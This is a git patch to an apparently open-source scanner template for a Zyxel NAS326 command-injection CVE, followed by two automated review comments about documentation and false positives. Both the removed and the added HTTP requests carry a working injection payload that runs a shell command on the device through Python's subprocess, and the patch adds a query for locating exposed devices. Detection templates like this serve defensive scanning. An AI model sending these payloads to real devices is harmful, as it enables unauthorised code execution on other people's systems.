From 115e416027146631ed14031e858907f9cdca73fb Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 19 Jun 2024 18:41:25 +0530
Subject: [PATCH] verified poc

---
 http/cves/2024/CVE-2024-29973.yaml | 19 +++++++++++++++----
 1 file changed, 15 insertions(+), 4 deletions(-)

diff --git a/http/cves/2024/CVE-2024-29973.yaml b/http/cves/2024/CVE-2024-29973.yaml
index e8cc240bc7..94e18cbc27 100644
--- a/http/cves/2024/CVE-2024-29973.yaml
+++ b/http/cves/2024/CVE-2024-29973.yaml
@@ -1,7 +1,7 @@
 id: CVE-2024-29973
 
 info:
-  name: Zyxel NAS326 firmware < V5.21(AAZF.17)C0 - Command Injection
+  name: Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - Command Injection
   author: ritikchaddha
   severity: critical
   description: |
@@ -19,16 +19,27 @@ info:
     epss-percentile: 0.9971
     cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:*
   metadata:
+    verified: true
     max-request: 1
     vendor: zyxel
     product: nas326_firmware
-  tags: cve,cve2024,zyxel,rce
+    fofa-query: app="ZYXEL-NAS326"
+  tags: cve,cve2024,zyxel,rce,intrusive
+variables:
+  string: "{{randstr}}"
 
 http:
   - raw:
       - |
-        GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1
+        POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
         Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
+
+        ------WebKitFormBoundarygcflwtei
+        Content-Disposition: form-data; name="c0"
+
+        storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("echo {{string}}", shell=True)#
+        ------WebKitFormBoundarygcflwtei--
 
     matchers:
       - type: dsl
@@ -36,5 +47,5 @@ http:
           - "status_code == 200"
          - "contains(body, 'errmsg0\": \"OK')"
          - "contains(header, 'application/json')"
-          - regex('uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)', body)
+          - "contains(body, '{{string}}')"
         condition: and
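Review bot: The second hunk's raw request still runs a shell command on the target, but nothing in the template records that the command is now a benign `echo` of a per-scan random marker rather than the previous `id`; a reader who sees `verified: true` and the new `intrusive` tag has to reconstruct that from the payload line. I would add a comment above `variables:`, `# {{randstr}} is a per-scan marker: the injected command only echoes it and the matcher looks for it in the response`, and keep `intrusive` since a command is still executed on the NAS. The `info:` mapping begins before this hunk and `http:` continues past it, so if `description` still refers to the earlier GET form of the request it should be updated to match the POST form — that part is not visible here.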
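Review bot: The third hunk's new matcher `contains(body, '{{string}}')` is also satisfied by any response that reflects the submitted `c0` field, because the marker appears verbatim in the request body; the removed `regex('uid=...')` line only matched real command output, so the change trades a false-negative risk for a false-positive one. The surrounding `errmsg0": "OK` and `application/json` conditions narrow this but do not exclude an error body that echoes the input, and I cannot tell from the template whether patched firmware reflects `c0`. If that is not known, note the limitation in the template, for example `# marker may be reflected by the endpoint; treat a hit as a candidate for manual confirmation`, so a match is not reported as confirmed execution. The `dsl:` list this hunk edits begins before the hunk.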